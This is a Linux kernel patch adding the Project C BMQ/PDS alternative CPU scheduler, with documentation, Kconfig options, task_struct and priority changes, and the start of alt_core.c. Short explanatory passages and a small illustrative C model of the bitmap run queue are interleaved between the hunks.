+index 6cfa6e3996cf..1b6a407213da 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5437,6 +5437,12 @@
+ 	sa1100ir	[NET]
+ 			See drivers/net/irda/sa1100_ir.c.
+ 
++	sched_timeslice=
++			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
++			Format: integer 2, 4
++			Default: 4
++			See Documentation/scheduler/sched-BMQ.txt
++
+ 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
+ 
+ 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
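
For reference, booting with "sched_timeslice=2" on the kernel command line
selects the 2 ms slice; any other value falls back to the 4 ms default,
matching the sched_timeslice() early_param handler in alt_core.c later in
this patch.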
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 46e3d62c0eea..fb4568c919d0 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1597,3 +1597,13 @@ is 10 seconds.
+ 
+ The softlockup threshold is (``2 * watchdog_thresh``). Setting this
+ tunable to zero will disable lockup detection altogether.
++
++yield_type:
++===========
++
++BMQ/PDS CPU scheduler only. This determines what type of yield calls
++to sched_yield will perform.
++
++  0 - No yield.
++  1 - Deboost and requeue task. (default)
++  2 - Set run queue skip task.
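
On a running BMQ/PDS kernel this tunable is expected to appear as
/proc/sys/kernel/yield_type like any other kernel sysctl, so
"sysctl -w kernel.yield_type=0" (or writing the value directly to that file)
selects the no-yield behaviour for subsequent sched_yield() calls.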
+diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
+new file mode 100644
+index 000000000000..05c84eec0f31
+--- /dev/null
++++ b/Documentation/scheduler/sched-BMQ.txt
+@@ -0,0 +1,110 @@
++                         BitMap queue CPU Scheduler
++                         --------------------------
++
++CONTENT
++========
++
++ Background
++ Design
++   Overview
++   Task policy
++   Priority management
++   BitMap Queue
++   CPU Assignment and Migration
++
++
++Background
++==========
++
++The BitMap Queue CPU scheduler, referred to as BMQ from here on, is an
++evolution of the earlier Priority and Deadline based Skiplist multiple queue
++scheduler (PDS), and is inspired by the Zircon scheduler. Its goal is to keep
++the scheduler code simple while staying efficient and scalable for interactive
++tasks such as desktop use, movie playback and gaming.
++
++Design
++======
++
++Overview
++--------
++
++BMQ uses a per-CPU run queue design: each (logical) CPU has its own run
++queue and is responsible for scheduling the tasks that are put into that
++run queue.
++
++The run queue is a set of priority queues. Note that, as data structures,
++these queues are FIFO queues for non-rt tasks and priority queues for rt
++tasks; see BitMap Queue below for details. BMQ is optimized for non-rt tasks,
++given that most applications are non-rt tasks. Whether a queue is FIFO or
++priority, each queue is an ordered list of runnable tasks awaiting execution,
++and the data structures are the same. When it is time for a new task to run,
++the scheduler simply looks for the lowest numbered queue that contains a task
++and runs the first task from the head of that queue. The per-CPU idle task is
++also in the run queue, so the scheduler can always find a task to run from
++its run queue.
++
++Each task is assigned the same timeslice (default 4 ms) when it is picked to
++start running. A task is reinserted at the end of the appropriate priority
++queue when it uses up its whole timeslice. When the scheduler selects a new
++task from the priority queue, it sets the CPU's preemption timer for the
++remainder of the previous timeslice. When that timer fires, the scheduler
++stops executing that task, selects another task and starts over again.
++
++If a task blocks waiting for a shared resource then it's taken out of its
++priority queue and is placed in a wait queue for the shared resource. When it
++is unblocked it will be reinserted in the appropriate priority queue of an
++eligible CPU.
++
++Task policy
++-----------
++
++BMQ supports the DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policies,
++like the mainline CFS scheduler. But BMQ is heavily optimized for non-rt
++tasks, that is, NORMAL/BATCH/IDLE policy tasks. Below are the implementation
++details of each policy.
++
++DEADLINE
++	It is squashed as a priority 0 FIFO task.
++
++FIFO/RR
++	All RT tasks share one single priority queue in the BMQ run queue design.
++The complexity of the insert operation is O(n). BMQ is not designed for
++systems that run mostly rt policy tasks.
++
++NORMAL/BATCH/IDLE
++	BATCH and IDLE tasks are treated as the same policy. They compete for CPU
++with NORMAL policy tasks, but they just don't boost. To control the priority
++of NORMAL/BATCH/IDLE tasks, simply use the nice level.
++
++ISO
++	ISO policy is not supported in BMQ. Please use a nice level -20 NORMAL
++policy task instead.
++
++Priority management
++-------------------
++
++RT tasks have priorities from 0 to 99. For non-rt tasks, there are three
++different factors used to determine the effective priority of a task; the
++effective priority determines which queue the task will be in.
++
++The first factor is simply the task's static priority, which is assigned from
++the task's nice level: [-20, 19] from userland's point of view and [0, 39]
++internally.
++
++The second factor is the priority boost. This is a value bounded within
++[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority; it is
++modified in the following cases:
++
++* When a thread has used up its entire timeslice, always deboost it by
++increasing its boost value by one.
++* When a thread gives up cpu control (voluntarily or not) to reschedule, and
++its switch-in time (the time since it last switched in and ran) is below the
++threshold based on its priority boost, boost it by decreasing its boost value
++by one, capped at 0 (it won't go negative).
++
++The intent in this system is to ensure that interactive threads are serviced
++quickly. These are usually the threads that interact directly with the user
++and cause user-perceivable latency. These threads usually do little work and
++spend most of their time blocked awaiting another user event. So they get the
++priority boost from unblocking while background threads that do most of the
++processing receive the priority penalty for using their entire timeslice.
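
To make the mechanisms documented above concrete (the bitmap-indexed FIFO
queues from the Overview and the bounded priority boost), here is a minimal
user-space model in C. It is an illustrative sketch with invented names, not
the patch's own code; the real implementation scans rq->queue.bitmap with
find_first_bit(), as alt_core.c further down in this patch shows:

    #include <stdio.h>

    #define NR_QUEUES        64
    #define MAX_PRIORITY_ADJ 7   /* BMQ's bound, as quoted above */

    struct task {
            int id;
            int boost;                 /* in [-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] */
            struct task *next;         /* FIFO link within one queue */
    };

    struct runqueue {
            unsigned long long bitmap; /* bit n set => queue n is non-empty */
            struct task *head[NR_QUEUES];
            struct task *tail[NR_QUEUES];
    };

    static void enqueue(struct runqueue *rq, struct task *t, int prio)
    {
            t->next = NULL;
            if (rq->head[prio])
                    rq->tail[prio]->next = t;
            else
                    rq->head[prio] = t;
            rq->tail[prio] = t;
            rq->bitmap |= 1ULL << prio;
    }

    /* Run the first task from the lowest numbered non-empty queue. */
    static struct task *pick_next(struct runqueue *rq)
    {
            int prio;
            struct task *t;

            if (!rq->bitmap)
                    return NULL; /* never happens in the kernel: idle is queued */
            prio = __builtin_ctzll(rq->bitmap); /* lowest set bit */
            t = rq->head[prio];
            rq->head[prio] = t->next;
            if (!rq->head[prio]) {
                    rq->tail[prio] = NULL;
                    rq->bitmap &= ~(1ULL << prio);
            }
            return t;
    }

    /* Timeslice used up: deboost by increasing the boost value by one. */
    static void deboost(struct task *t)
    {
            if (t->boost < MAX_PRIORITY_ADJ)
                    t->boost++;
    }

    /* Rescheduled quickly enough: boost by decreasing the boost value. */
    static void boost(struct task *t)
    {
            if (t->boost > -MAX_PRIORITY_ADJ)
                    t->boost--;
    }

    int main(void)
    {
            struct runqueue rq = { 0 };
            struct task a = { .id = 1 }, b = { .id = 2 };

            enqueue(&rq, &a, 5);
            enqueue(&rq, &b, 3);
            deboost(&a);
            boost(&b);
            printf("next: task %d\n", pick_next(&rq)->id); /* task 2 */
            return 0;
    }

The effective queue index of a non-rt task is its static priority offset by
this boost value, which is what keeps recently woken interactive threads ahead
of timeslice-burning background threads.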
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b..2a8530021b23 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
+ 		seq_puts(m, "0 0 0\n");
+ 	else
+ 		seq_printf(m, "%llu %llu %lu\n",
+-		   (unsigned long long)task->se.sum_exec_runtime,
++		   (unsigned long long)tsk_seruntime(task),
+ 		   (unsigned long long)task->sched_info.run_delay,
+ 		   task->sched_info.pcount);
+ 
+diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
+index 8874f681b056..59eb72bf7d5f 100644
+--- a/include/asm-generic/resource.h
++++ b/include/asm-generic/resource.h
+@@ -23,7 +23,7 @@
+ 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
+ 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
+-	[RLIMIT_NICE]		= { 0, 0 },				\
++	[RLIMIT_NICE]		= { 30, 30 },				\
+ 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
+ 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ }
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index 853d08f7562b..ad7e050d7455 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -762,8 +762,14 @@ struct task_struct {
+ 	unsigned int			ptrace;
+ 
+ #ifdef CONFIG_SMP
+-	int				on_cpu;
+ 	struct __call_single_node	wake_entry;
++#endif
++#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
++	int				on_cpu;
++#endif
++
++#ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 	unsigned int			wakee_flips;
+ 	unsigned long			wakee_flip_decay_ts;
+ 	struct task_struct		*last_wakee;
+@@ -777,6 +783,7 @@ struct task_struct {
+ 	 */
+ 	int				recent_used_cpu;
+ 	int				wake_cpu;
++#endif /* !CONFIG_SCHED_ALT */
+ #endif
+ 	int				on_rq;
+ 
+@@ -785,6 +792,20 @@ struct task_struct {
+ 	int				normal_prio;
+ 	unsigned int			rt_priority;
+ 
++#ifdef CONFIG_SCHED_ALT
++	u64				last_ran;
++	s64				time_slice;
++	int				sq_idx;
++	struct list_head		sq_node;
++#ifdef CONFIG_SCHED_BMQ
++	int				boost_prio;
++#endif /* CONFIG_SCHED_BMQ */
++#ifdef CONFIG_SCHED_PDS
++	u64				deadline;
++#endif /* CONFIG_SCHED_PDS */
++	/* sched_clock time spent running */
++	u64				sched_time;
++#else /* !CONFIG_SCHED_ALT */
+ 	struct sched_entity		se;
+ 	struct sched_rt_entity		rt;
+ 	struct sched_dl_entity		dl;
+@@ -795,6 +816,7 @@ struct task_struct {
+ 	unsigned long			core_cookie;
+ 	unsigned int			core_occupation;
+ #endif
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_CGROUP_SCHED
+ 	struct task_group		*sched_task_group;
+@@ -1539,6 +1561,15 @@ struct task_struct {
+ 	 */
+ };
+ 
++#ifdef CONFIG_SCHED_ALT
++#define tsk_seruntime(t)		((t)->sched_time)
++/* replace the uncertian rt_timeout with 0UL */
++#define tsk_rttimeout(t)		(0UL)
++#else /* CFS */
++#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
++#define tsk_rttimeout(t)	((t)->rt.timeout)
++#endif /* !CONFIG_SCHED_ALT */
++
+ static inline struct pid *task_pid(struct task_struct *task)
+ {
+ 	return task->thread_pid;
+diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
+index 7c83d4d5a971..fa30f98cb2be 100644
+--- a/include/linux/sched/deadline.h
++++ b/include/linux/sched/deadline.h
+@@ -1,5 +1,24 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ 
++#ifdef CONFIG_SCHED_ALT
++
++static inline int dl_task(struct task_struct *p)
++{
++	return 0;
++}
++
++#ifdef CONFIG_SCHED_BMQ
++#define __tsk_deadline(p)	(0UL)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
++#endif
++
++#else
++
++#define __tsk_deadline(p)	((p)->dl.deadline)
++
+ /*
+  * SCHED_DEADLINE tasks has negative priorities, reflecting
+  * the fact that any of them has higher prio than RT and
+@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
+ {
+ 	return dl_prio(p->prio);
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ static inline bool dl_time_before(u64 a, u64 b)
+ {
+diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
+index ab83d85e1183..6af9ae681116 100644
+--- a/include/linux/sched/prio.h
++++ b/include/linux/sched/prio.h
+@@ -18,6 +18,32 @@
+ #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
+ #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
+ 
++#ifdef CONFIG_SCHED_ALT
++
++/* Undefine MAX_PRIO and DEFAULT_PRIO */
++#undef MAX_PRIO
++#undef DEFAULT_PRIO
++
++/* +/- priority levels from the base priority */
++#ifdef CONFIG_SCHED_BMQ
++#define MAX_PRIORITY_ADJ	(7)
++
++#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
++#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define MAX_PRIORITY_ADJ	(0)
++
++#define MIN_NORMAL_PRIO		(128)
++#define NORMAL_PRIO_NUM		(64)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
++#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
++#endif
++
++#endif /* CONFIG_SCHED_ALT */
++
+ /*
+  * Convert user-nice values [ -20 ... 0 ... 19 ]
+  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
+diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
+index 994c25640e15..8c050a59ece1 100644
+--- a/include/linux/sched/rt.h
++++ b/include/linux/sched/rt.h
+@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
+ 
+ 	if (policy == SCHED_FIFO || policy == SCHED_RR)
+ 		return true;
++#ifndef CONFIG_SCHED_ALT
+ 	if (policy == SCHED_DEADLINE)
+ 		return true;
++#endif
+ 	return false;
+ }
+ 
+diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
+index 816df6cc444e..c8da08e18c91 100644
+--- a/include/linux/sched/topology.h
++++ b/include/linux/sched/topology.h
+@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
+ 
+ #endif	/* !CONFIG_SMP */
+ 
+-#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
++#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
++	!defined(CONFIG_SCHED_ALT)
+ extern void rebuild_sched_domains_energy(void);
+ #else
+ static inline void rebuild_sched_domains_energy(void)
+diff --git a/init/Kconfig b/init/Kconfig
+index 44e90b28a30f..af24591984ab 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -821,6 +821,7 @@ menu "Scheduler features"
+ config UCLAMP_TASK
+ 	bool "Enable utilization clamping for RT/FAIR tasks"
+ 	depends on CPU_FREQ_GOV_SCHEDUTIL
++	depends on !SCHED_ALT
+ 	help
+ 	  This feature enables the scheduler to track the clamped utilization
+ 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
+@@ -867,6 +868,35 @@ config UCLAMP_BUCKETS_COUNT
+ 
+ 	  If in doubt, use the default value.
+ 
++menuconfig SCHED_ALT
++	bool "Alternative CPU Schedulers"
++	default y
++	help
++	  This feature enables alternative CPU schedulers.
++
++if SCHED_ALT
++
++choice
++	prompt "Alternative CPU Scheduler"
++	default SCHED_BMQ
++
++config SCHED_BMQ
++	bool "BMQ CPU scheduler"
++	help
++	  The BitMap Queue CPU scheduler for excellent interactivity and
++	  responsiveness on the desktop and solid scalability on normal
++	  hardware and commodity servers.
++
++config SCHED_PDS
++	bool "PDS CPU scheduler"
++	help
++	  The Priority and Deadline based Skip list multiple queue CPU
++	  Scheduler.
++
++endchoice
++
++endif
++
+ endmenu
+ 
+ #
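
In .config terms, the menu above means a BMQ build reduces to setting
CONFIG_SCHED_ALT=y plus CONFIG_SCHED_BMQ=y (a PDS build would set
CONFIG_SCHED_PDS instead); with SCHED_ALT disabled, the kernel falls back to
the stock CFS code paths guarded by the !CONFIG_SCHED_ALT conditionals seen
throughout this patch.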
+@@ -924,6 +954,7 @@ config NUMA_BALANCING
+ 	depends on ARCH_SUPPORTS_NUMA_BALANCING
+ 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
+ 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
++	depends on !SCHED_ALT
+ 	help
+ 	  This option adds support for automatic NUMA aware memory/task placement.
+ 	  The mechanism is quite primitive and is based on migrating memory when
+@@ -1021,6 +1052,7 @@ config FAIR_GROUP_SCHED
+ 	depends on CGROUP_SCHED
+ 	default CGROUP_SCHED
+ 
++if !SCHED_ALT
+ config CFS_BANDWIDTH
+ 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
+ 	depends on FAIR_GROUP_SCHED
+@@ -1043,6 +1075,7 @@ config RT_GROUP_SCHED
+ 	  realtime bandwidth for them.
+ 	  See Documentation/scheduler/sched-rt-group.rst for more information.
+ 
++endif #!SCHED_ALT
+ endif #CGROUP_SCHED
+ 
+ config UCLAMP_TASK_GROUP
+@@ -1287,6 +1320,7 @@ config CHECKPOINT_RESTORE
+ 
+ config SCHED_AUTOGROUP
+ 	bool "Automatic process group scheduling"
++	depends on !SCHED_ALT
+ 	select CGROUPS
+ 	select CGROUP_SCHED
+ 	select FAIR_GROUP_SCHED
+diff --git a/init/init_task.c b/init/init_task.c
+index ff6c4b9bfe6b..19e9c662d1a1 100644
+--- a/init/init_task.c
++++ b/init/init_task.c
+@@ -75,9 +75,15 @@ struct task_struct init_task
+ 	.stack		= init_stack,
+ 	.usage		= REFCOUNT_INIT(2),
+ 	.flags		= PF_KTHREAD,
++#ifdef CONFIG_SCHED_ALT
++	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++	.static_prio	= DEFAULT_PRIO,
++	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++#else
+ 	.prio		= MAX_PRIO - 20,
+ 	.static_prio	= MAX_PRIO - 20,
+ 	.normal_prio	= MAX_PRIO - 20,
++#endif
+ 	.policy		= SCHED_NORMAL,
+ 	.cpus_ptr	= &init_task.cpus_mask,
+ 	.user_cpus_ptr	= NULL,
+@@ -88,6 +94,17 @@ struct task_struct init_task
+ 	.restart_block	= {
+ 		.fn = do_no_restart_syscall,
+ 	},
++#ifdef CONFIG_SCHED_ALT
++	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
++#ifdef CONFIG_SCHED_BMQ
++	.boost_prio	= 0,
++	.sq_idx		= 15,
++#endif
++#ifdef CONFIG_SCHED_PDS
++	.deadline	= 0,
++#endif
++	.time_slice	= HZ,
++#else
+ 	.se		= {
+ 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
+ 	},
+@@ -95,6 +112,7 @@ struct task_struct init_task
+ 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
+ 		.time_slice	= RR_TIMESLICE,
+ 	},
++#endif
+ 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
+ #ifdef CONFIG_SMP
+ 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
+diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
+index c2f1fd95a821..41654679b1b2 100644
+--- a/kernel/Kconfig.preempt
++++ b/kernel/Kconfig.preempt
+@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
+ 
+ config SCHED_CORE
+ 	bool "Core Scheduling for SMT"
+-	depends on SCHED_SMT
++	depends on SCHED_SMT && !SCHED_ALT
+ 	help
+ 	  This option permits Core Scheduling, a means of coordinated task
+ 	  selection across SMT siblings. When enabled -- see
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index ca826bd1eba3..60e194f1d6d8 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -791,7 +791,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_SMP
++#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * Helper routine for generate_sched_domains().
+  * Do cpusets a, b have overlapping effective cpus_allowed masks?
+@@ -1187,7 +1187,7 @@ static void rebuild_sched_domains_locked(void)
+ 	/* Have scheduler rebuild the domains */
+ 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
+ }
+-#else /* !CONFIG_SMP */
++#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
+ static void rebuild_sched_domains_locked(void)
+ {
+ }
+diff --git a/kernel/delayacct.c b/kernel/delayacct.c
+index e39cb696cfbd..463423572e09 100644
+--- a/kernel/delayacct.c
++++ b/kernel/delayacct.c
+@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
+ 	 */
+ 	t1 = tsk->sched_info.pcount;
+ 	t2 = tsk->sched_info.run_delay;
+-	t3 = tsk->se.sum_exec_runtime;
++	t3 = tsk_seruntime(tsk);
+ 
+ 	d->cpu_count += t1;
+ 
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 15dc2ec80c46..1e583e0f89a7 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -172,7 +172,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 			sig->curr_target = next_thread(tsk);
+ 	}
+ 
+-	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
++	add_device_randomness((const void*) &tsk_seruntime(tsk),
+ 			      sizeof(unsigned long long));
+ 
+ 	/*
+@@ -193,7 +193,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 	sig->inblock += task_io_get_inblock(tsk);
+ 	sig->oublock += task_io_get_oublock(tsk);
+ 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
+-	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
++	sig->sum_sched_runtime += tsk_seruntime(tsk);
+ 	sig->nr_threads--;
+ 	__unhash_process(tsk, group_dead);
+ 	write_sequnlock(&sig->stats_lock);
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 728f434de2bb..0e1082a4e878 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -337,21 +337,25 @@ static __always_inline void
+ waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
+ {
+ 	waiter->prio = __waiter_prio(task);
+-	waiter->deadline = task->dl.deadline;
++	waiter->deadline = __tsk_deadline(task);
+ }
+ 
+ /*
+  * Only use with rt_mutex_waiter_{less,equal}()
+  */
+ #define task_to_waiter(p)	\
+-	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
+ 
+ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 						struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline < right->deadline);
++#else
+ 	if (left->prio < right->prio)
+ 		return 1;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -360,16 +364,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return dl_time_before(left->deadline, right->deadline);
++#endif
+ 
+ 	return 0;
++#endif
+ }
+ 
+ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 						 struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline == right->deadline);
++#else
+ 	if (left->prio != right->prio)
+ 		return 0;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -378,8 +388,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return left->deadline == right->deadline;
++#endif
+ 
+ 	return 1;
++#endif
+ }
+ 
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
+index 976092b7bd45..31d587c16ec1 100644
+--- a/kernel/sched/Makefile
++++ b/kernel/sched/Makefile
+@@ -28,7 +28,12 @@ endif
+ # These compilation units have roughly the same size and complexity - so their
+ # build parallelizes well and finishes roughly at once:
+ #
++ifdef CONFIG_SCHED_ALT
++obj-y += alt_core.o
++obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
++else
+ obj-y += core.o
+ obj-y += fair.o
++endif
+ obj-y += build_policy.o
+ obj-y += build_utility.o
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+new file mode 100644
+index 000000000000..f5e9c01f9382
+--- /dev/null
++++ b/kernel/sched/alt_core.c
+@@ -0,0 +1,8111 @@
++/*
++ *  kernel/sched/alt_core.c
++ *
++ *  Core alternative kernel scheduler code and related syscalls
++ *
++ *  Copyright (C) 1991-2002  Linus Torvalds
++ *
++ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
++ *		a whole lot of those previous things.
++ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
++ *		scheduler by Alfred Chen.
++ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
++ */
++#include <linux/sched/cputime.h>
++#include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
++#include <linux/sched/loadavg.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/nohz.h>
++#include <linux/sched/stat.h>
++#include <linux/sched/wake_q.h>
++
++#include <linux/blkdev.h>
++#include <linux/context_tracking.h>
++#include <linux/cpuset.h>
++#include <linux/delayacct.h>
++#include <linux/init_task.h>
++#include <linux/kcov.h>
++#include <linux/kprobes.h>
++#include <linux/nmi.h>
++#include <linux/scs.h>
++
++#include <uapi/linux/sched/types.h>
++
++#include <asm/irq_regs.h>
++#include <asm/switch_to.h>
++
++#define CREATE_TRACE_POINTS
++#include <trace/events/sched.h>
++#undef CREATE_TRACE_POINTS
++
++#include "sched.h"
++
++#include "pelt.h"
++
++#include "../../io_uring/io-wq.h"
++#include "../smpboot.h"
++
++/*
++ * Export tracepoints that act as a bare tracehook (ie: have no trace event
++ * associated with them) to allow external modules to probe them.
++ */
++EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
++
++#ifdef CONFIG_SCHED_DEBUG
++#define sched_feat(x)	(1)
++/*
++ * Print a warning if need_resched is set for the given duration (if
++ * LATENCY_WARN is enabled).
++ *
++ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
++ * per boot.
++ */
++__read_mostly int sysctl_resched_latency_warn_ms = 100;
++__read_mostly int sysctl_resched_latency_warn_once = 1;
++#else
++#define sched_feat(x)	(0)
++#endif /* CONFIG_SCHED_DEBUG */
++
++#define ALT_SCHED_VERSION "v6.2-r0"
++
++/* rt_prio(prio) defined in include/linux/sched/rt.h */
++#define rt_task(p)		rt_prio((p)->prio)
++#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
++#define task_has_rt_policy(p)	(rt_policy((p)->policy))
++
++#define STOP_PRIO		(MAX_RT_PRIO - 1)
++
++/* Default time slice is 4 in ms, can be set via kernel parameter "sched_timeslice" */
++u64 sched_timeslice_ns __read_mostly = (4 << 20);
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
++
++#ifdef CONFIG_SCHED_BMQ
++#include "bmq.h"
++#endif
++#ifdef CONFIG_SCHED_PDS
++#include "pds.h"
++#endif
++
++struct affinity_context {
++	const struct cpumask *new_mask;
++	struct cpumask *user_mask;
++	unsigned int flags;
++};
++
++static int __init sched_timeslice(char *str)
++{
++	int timeslice_ms;
++
++	get_option(&str, &timeslice_ms);
++	if (2 != timeslice_ms)
++		timeslice_ms = 4;
++	sched_timeslice_ns = timeslice_ms << 20;
++	sched_timeslice_imp(timeslice_ms);
++
++	return 0;
++}
++early_param("sched_timeslice", sched_timeslice);
++
++/* Reschedule if less than this many μs left */
++#define RESCHED_NS		(100 << 10)
++
++/**
++ * sched_yield_type - Choose what sort of yield sched_yield will perform.
++ * 0: No yield.
++ * 1: Deboost and requeue task. (default)
++ * 2: Set rq skip task.
++ */
++int sched_yield_type __read_mostly = 1;
++
++#ifdef CONFIG_SMP
++static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
++
++DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
++
++#ifdef CONFIG_SCHED_SMT
++DEFINE_STATIC_KEY_FALSE(sched_smt_present);
++EXPORT_SYMBOL_GPL(sched_smt_present);
++#endif
++
++/*
++ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
++ * the domain), this allows us to quickly tell if two cpus are in the same cache
++ * domain, see cpus_share_cache().
++ */
++DEFINE_PER_CPU(int, sd_llc_id);
++#endif /* CONFIG_SMP */
++
++static DEFINE_MUTEX(sched_hotcpu_mutex);
++
++DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++#ifndef finish_arch_post_lock_switch
